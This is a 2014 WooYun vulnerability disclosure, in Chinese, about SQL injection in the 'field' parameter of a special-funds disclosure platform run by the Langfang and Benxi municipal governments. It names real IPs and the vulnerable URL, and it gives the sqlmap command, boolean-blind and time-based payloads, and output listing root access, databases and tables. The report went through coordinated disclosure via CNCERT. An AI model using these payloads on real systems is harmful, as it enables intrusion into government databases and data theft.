漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-053936
漏洞标题:某专项平台通用两处SQL注入漏洞
相关厂商:廊坊市人民政府
漏洞作者: Mr.leo
提交时间:2014-03-18 13:18
修复时间:2014-05-02 13:18
公开时间:2014-05-02 13:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-25: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向核心白帽子及相关领域专家公开
2014-04-14: 细节向普通白帽子公开
2014-04-24: 细节向实习白帽子公开
2014-05-02: 细节向公众公开
简要描述:
某专项平台通用两处SQL注入漏洞
详细说明:
http://60.10.25.13/www/ 廊坊市专项资金公开网
漏洞参数:field
http://60.10.25.13/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village=
root用户
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 1253=1253&keywords=&order=desc&style=&town=&un
it_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&uni
t_id=&village=
---
[17:18:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[17:18:02] [INFO] fetching current user
[17:18:02] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:18:02] [INFO] retrieved:
[17:18:12] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[17:25:42] [INFO] fetching current database
[17:25:42] [INFO] retrieved: langfang
current database: 'langfang'
[17:35:33] [INFO] fetching database names
[17:35:33] [INFO] fetching number of databases
[17:35:33] [INFO] retrieved: 8
[17:36:38] [INFO] retrieved: information_schema
[17:57:08] [INFO] retrieved: gaogang
[18:05:45] [INFO] retrieved: langfang
[18:15:25] [INFO] retrieved: langfang_bake
[18:30:29] [INFO] retrieved: langfang_peixun
[18:47:43] [INFO] retrieved: mysql
[18:54:11] [INFO] retrieved: test
[18:59:34] [INFO] retrieved: zuzhijigou-tmp
available databases [8]:
[*] `zuzhijigou-tmp`
[*] gaogang
[*] information_schema
[*] langfang
[*] langfang_bake
[*] langfang_peixun
[*] mysql
[*] test
218张表,部分数据
[09:11:44] [INFO] fetching tables for database: 'langfang'
[09:11:44] [INFO] fetching number of tables for database 'langfang'
[09:11:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:11:44] [INFO] retrieved: 218
[09:13:54] [INFO] retrieved: admin
[09:20:22] [INFO] retrieved: admin_identify
[09:31:58] [INFO] retrieved: admin_login_info
[09:44:54] [INFO] retrieved: admin_order_set
[09:56:50] [INFO] retrieved: admin_persona_func
[10:11:55] [INFO] retrieved: admin_right
[10:19:29] [INFO] retrieved: admin_unit_right
[10:32:28] [INFO] retrieved: book_temp
[10:43:25] [INFO] retrieved: city
[10:48:58] [INFO] retrieved: city_copy
[10:56:05] [INFO] retrieved: counter
[11:03:56] [INFO] retrieved: cp_info
[11:11:48] [INFO] retrieved: cp_re
[11:15:41] [INFO] retrieved: cp_reply
[11:20:46] [INFO] retrieved: cp_reply_appraise
[11:32:49] [INFO] retrieved: cp_to
[11:36:41] [INFO] retrieved: cp_to_log
[11:42:50] [INFO] retrieved: cp_unit
[11:48:51] [INFO] retrieved: department
[12:00:51] [INFO] retrieved: flink
[12:07:28] [INFO] retrieved: flink_type
[12:14:41] [INFO] retrieved: funds_acc
[12:24:41] [INFO] retrieved: funds_acc_item
[12:32:32] [INFO] retrieved: funds_account
[12:39:28] [INFO] retrieved: funds_class
[12:47:01] [INFO] retrieved: funds_class_unit
[12:55:11] [INFO] retrieved: funds_class_year
[13:02:36] [INFO] retrieved: funds_coa
[13:07:05] [INFO] retrieved: funds_coa_acc
[13:13:53] [INFO] retrieved: funds_detail
[13:22:31] [INFO] retrieved: funds_detail_in
[13:28:41] [INFO] retrieved: funds_detail_in_log
[13:36:24] [INFO] retrieved: funds_detail_out
[13:42:53] [INFO] retrieved: funds_detail_out_excel
[13:52:55] [INFO] retrieved: funds_detail_out_fujian
[14:03:15] [INFO] retrieved: funds_detail_res
[14:09:44] [INFO] retrieved: funds_detail_send
[14:17:19] [INFO] retrieved: funds_detail_send_log
[14:25:25] [INFO] retrieved: funds_detail_tmp
[14:31:58] [INFO] retrieved: funds_detail_total
[14:39:43] [INFO] retrieved: funds_edu_del
[14:49:26] [INFO] retrieved: funds_edu_head
[14:56:33] [INFO] retrieved: funds_edu_res
[15:02:33] [INFO] retrieved: funds_fujian
[15:11:12] [INFO] retrieved: funds_fujian_lis
http://218.25.228.157/www/ 本溪市专项资金公开网
参数还是一样,field
[root@Hacker~]# Sqlmap -u "http://218.25.228.157/www/item_seach.php?field=plan_m
oney&keywords=&order=desc&style=&town=&unit_id=&village=" --dbs --current-user --current-db
root用户
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 3510=3510&keywords=&order=desc&style=&town=&un
it_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&uni
t_id=&village=
---
[20:19:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[20:19:50] [INFO] fetching current user
[20:19:50] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:19:50] [INFO] retrieved:
[20:20:00] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[20:27:53] [INFO] fetching current database
[20:27:53] [INFO] retrieved: benxi
current database: 'benxi'
[20:34:43] [INFO] fetching database names
[20:34:43] [INFO] fetching number of databases
[20:34:43] [INFO] retrieved: 4
[20:35:42] [INFO] retrieved: information_schema
[20:57:25] [INFO] retrieved: benxi
[21:04:17] [INFO] retrieved: mysql
[21:11:08] [INFO] retrieved: test
available databases [4]:
[*] benxi
[*] information_schema
[*] mysql
[*] test
215张表 时间注入,部分数据说明问题
[08:52:46] [INFO] fetching tables for database: 'benxi'
[08:52:46] [INFO] fetching number of tables for database 'benxi'
[08:52:46] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:52:46] [INFO] retrieved: 215
[08:55:05] [INFO] retrieved: admin
[09:01:58] [INFO] retrieved: admin_identify
[09:14:23] [INFO] retrieved: admin_login_info
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-03-25 23:12
厂商回复:
已经转由CNCERT分别下发给河北和辽宁分中心处置。暂未直接联系软件生产厂商,已经建议网站管理单位要求厂商提供解决方案。
最新状态:
暂无